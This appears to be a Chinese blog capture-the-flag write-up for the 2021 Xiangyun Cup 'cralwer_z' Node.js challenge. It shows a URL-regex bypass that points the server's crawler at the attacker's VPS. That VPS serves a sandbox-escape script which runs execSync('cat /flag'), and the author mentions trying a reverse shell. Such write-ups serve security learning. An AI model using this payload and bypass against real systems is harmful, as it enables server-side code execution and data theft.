[2021祥云杯]cralwer_z

最新推荐文章于 2022-03-02 09:50:50 发布
最新推荐文章于 2022-03-02 09:50:50 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: ssrf nodejs web学习 文章标签: javascript 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/120147572
版权
web学习 同时被 3 个专栏收录
39 篇文章 1 订阅
订阅专栏
ssrf
6 篇文章 0 订阅
订阅专栏
nodejs
6 篇文章 2 订阅
订阅专栏

[2021祥云杯]cralwer_z

这题我在buu上做的,直接给源代码了,不知道比赛时是不是也这样
在这里插入图片描述
这个文件的目录就是这些东西,还是js代码,有点烦,话不多说,审代码还是正常的从路由开始审起吧.这里提一下,我审代码喜欢先看各个路由,然后找危险函数,逆着去找利用链,我觉得这样的查找效果较好

先看index.js的,这里的就是简单的注册代码,没啥有价值的
在这里插入图片描述
接下来看一看user.js吧

我大致全局搜索试了一下,好像没有什么危险函数,那就只能慢慢审了呗。大致看了下我看到bucket路由有些请求头好像要发包的样子,我决定从这个路由开始看
在这里插入图片描述
可以看到它正则匹配user.bucket是否符合要求后,下面新建了一个Crawler类的对象page,而这page的属性据然是一些包的请求头,盲猜一会会发包,接着下面page就调用了goto方法
在这里插入图片描述
不难看出goto方法里面实现了this.crawler.visit()方法,而这个visit方法会去访问一个我们传入的url,那不出意外,利用点就是这里了。

现在我们回过头来看一看,这个url就是我们的user.bucket,我们要把想办法把它构造成我们的url

要利用首先最基本的就是要绕过正则
在这里插入图片描述
这个正则要求我们的url必须要包含oss-cn-beijing.ichunqiu.com ,因此我们可以在url的结尾跟上oss-cn-beijing.ichunqiu.com, 从而实现绕过,即类似于:http://IP/index.html?aaa=oss-cn-beijing.ichunqiu.com。或者直接#.oss-cn-beijing.ichunqiu.com

这个路由的bucket绕过搞定后,我们来看看bucket在其他地方的利用和变化

按顺序来先看/profile吧
在这里插入图片描述
这个路由前面是一些用户信息的校验
在这里插入图片描述
接着它会更新一些用户的信息,其中就有 personalBucket: bucket,即bucket的值给personalBucket,再接着下面根据用户信息生成了一个token
在这里插入图片描述
生成完token后,它会让bucket进行正则匹配,如果成功的话就可以将我们刚刚生成的token打印出来

到这里/profile就结束了,接下来看看下一个/verify
在这里插入图片描述
哦吼,这个路由先校验token然后根据token获取其中的信息

在这里插入图片描述
接下来,如果成功提取了token中的信息,先让token失效,也就是说一个token只能用一次

在这里插入图片描述
接下来根据token中获取的信息,更新用户的信息,注意这里有bucket: user.personalBucket,即ersonalBucket的值给bucket
在这里插入图片描述
再后面一些代码就没什么了,就是一些判断用户信息是否成功更新。

到这里所有路由的代码我们已经看完了,bucket的变化我们也了解了,现在讲一下怎么拿flag

这里得再提一下/profile和/bucket的正则这里,它们的正则过滤规则是一样的
在这里插入图片描述在这里插入图片描述所以我们的思路是:
1.要先访问profile,bucket的值要满足正则,可以产生一个token,这时候他想跳到/verify我们是不允许的,因为此时的personalBucket的url不是我们vps的url,而且这个url也满足了正则的匹配,这个到后面的/bucket路由就不能爬虫了。
2.所以这个时候我们要再发一个包去/profile,他的bucket的值是我们的vps地址且可以绕过那个正则,成功发包后personalBucket的值就是我们的vps地址了
3.这个时候再让产生token那个包重定向到/verify,此时personalBucket的值会给bucket上,所以这时bucket就是我们的vps地址了

操作流程如下:

首先开BP抓包,点下profile页面的updata即可,抓到后直接go拿到token
在这里插入图片描述
这里这个包就卡在这,然后在这个页面再点次send to repeater,相当于把这个包的内容复制下

这个时候把包的发送内容改下,主要就是改成自己的vps地址,直接go发送,这里可以看到它返回的信息中提示 “Admin will check if your bucket is qualified later.” ,看代码就知道这表明bucket的值成功覆盖

affiliation=1&age=1&bucket=http://vps/?oss-cn-beijing.ichunqiu.com

在这里插入图片描述之后回到tag9,也就是我之前发了包后获得token那个包,它的上面有个“Follow Redirection”重定向,点击后可以看到返回的内容中bucket已经变成了我们的vps地址

在这里插入图片描述
访问profile可以看到bucket已经成功更新

在这里插入图片描述接下来我们要在我们的vps上挂一个常用的js脚本读flag

<script>
a=this.constructor.constructor.constructor.constructor('return process')();b=a.mainModule.require('child_process');c=b.execSync('cat /flag').toString();document.write(c);
</script>

将上述代码写入index.html,后,我直接用python httpserver挂
在这里插入图片描述然后在浏览器上访问user/bucket即可获取flag
在这里插入图片描述
这题到这里算是做完了,这里再插一句,这题在buu上的环境可能有限制,我试了反弹shell但是弹不了

lmonstergg
关注
专栏目录
WP-2021祥云
ce666666的博客
01-16 690
前言 好多审计题,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的题目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这题就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
python cralwer (爬虫)心得
cykic的专栏
05-26 1422
最近用python做了个小crawler, 可以自动整理一些网站的内容,推送到当地文件中,做个小小的总结。 主要lib就是urllib 和 beautifulsoup. urllib和urllib2是很方便的网页提取库,核心就是发送各种自定义的url request,然后可以返回网页内容。 最简单的函数,判定一个网页是否存在: def isUrlExists(url):
2021祥云部分wp
m0_51357657的博客
08-24 914
祥云2021 目前只做了两道题(没办法 tcl。。。 MISC-鸣雏恋 下载下来是个word,打开只有一句话 不太对劲,放到010里看一看发现文件头50 4B 03 04 经典压缩包了,文件后缀改成zip,解压 得到一个txt和加密压缩包,文件打开感觉什么都没有。。。 但仔细看,第二行可显示字符没有190,所以是零宽度字符隐写 vim 一下,果然 放到在线网站上解一下 压缩包解完有129488张图片,两种图片代表01,转成二进制 二进制转换成ASCII码之后,发现是个base64转png 接下
祥云2021 Web复现
feng的博客
08-25 1928
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
祥云题解
蚁景网安学院
08-25 2262
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 # bad_cat战队WRITEUP 一、 战队信息 战队名称:bad_cat 战队排名:6 二、 解题情况 三、 解题过程 web **1、**ezyii 网上搜yii的1day https://xz.aliyun.com/t/9948#toc-6 思路类似于第四条链子 exp: <?p.
PyPI 官网下载 | alphaj_naver_stock_cralwer-0.1.1-py3-none-any.whl
02-08
《PyPI官网下载:了解与使用Python库"alphaj_naver_stock_cralwer"》 在Python编程领域,PyPI(Python Package Index)是全球最大的Python软件仓库,它提供了丰富的第三方库,使得开发者能够轻松地下载和安装所需的...
infraero_cralwer:Projeto desenvolvido,básicosobre网络爬虫和Ruby
03-17
【infraero_cralwer项目:探索网络爬虫与Ruby的基础】 该项目名为"infraero_cralwer",旨在介绍网络爬虫的基本概念和技术,同时利用Ruby编程语言进行实现。Ruby是一种面向对象的、易于理解的语言,常被用于开发各种...
Python_Crawler:使用Python工具的Internet Cralwer
03-19
在IT领域,网络爬虫(Internet Crawler)是一种自动化程序,用于从互联网上抓取大量数据,以便进行数据分析、搜索引擎索引或者特定信息提取。在这个主题中,我们将深入探讨如何使用Python来构建一个网络爬虫。...
2020祥云 CTFNu1L.pdf
03-15
2020祥云 CTF WP 高清PDF版
2021祥云 CTF pwn解 wp
qq_39948058的博客
08-26 1240
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4374
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
2021祥云web 部分wp
fmyyy1的博客
08-23 810
ezyii 说是最新的链子,题目把文件都筛选好了让我们找。写一下我的思路 看到RunProcess类 <?php namespace Codeception\Extension; class RunProcess { protected $output; protected $config = ['sleep' => 0]; protected static $events = []; private $processes = []; publ
BUU刷题记录——7
weixin_43610673的博客
02-20 3839
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不传值得话就可以进入if语句,跟进_fo
祥云2021web writeup
hezhing
08-27 3435
太菜了,一个web都没做出来。接下来是复现。好好学习一下大佬们的姿势,也记录一下。 参考师傅们的wp,网上有的,侵权删。
2021第二届“祥云”网络安全大赛 部分Writeup
qq_42815161的博客
08-23 3516
MISC ChieftainsSecret 题目描述:Our agent risked his life to install a mysterious device in the immemorial telephone, can you find out the chieftain's telephone number? Flag format: flag{11 digits} ChieftainsSecret.jpg题目附件给了一张老式轮盘电话机图片,猜测图片藏了东西,直接上linux分
祥云2021 Web简单题wp
feng的博客
08-23 610
前言 千言万语汇成一句:我真是太菜了。事实证明只会个php在卷成这样的ctf比赛里面只能挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打。 不会Java和js直接下线,只能卑微的做最简单题
【pwn】2021 祥云 (部分)
woodwhale的博客
10-07 4245
【pwn】2021 祥云 (部分) 前言 国庆的最后几天,一直在补题,发现祥云那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
Java 反序列化漏洞-Apache Commons Collections3
cjdgg的博客
03-02 4747
Java 反序列化漏洞-Apache Commons Collections3前言javassist+TemplatesImplcom.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 前言 之前已经学了CC1和CC2,接下来继续学习CC3。在CC2中我们用到了javassist修改字节码并配合TemplatesImpl攻击链来使用,因此我们很自然而然的想到,如果我们直接用javassist修改字节码并配合TemplatesImpl攻击链使用,就无需用I
PEER地震波数据下载指南:east_peer官网
考虑到文件名中的"cralwer_peer_east",此脚本可能是一个特定的爬虫实例,用于从PEER官网的东部服务器下载地震波数据集。 在使用此类脚本时,应当遵守PEER官网的使用条款和数据共享协议。自动化下载数据集可能涉及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值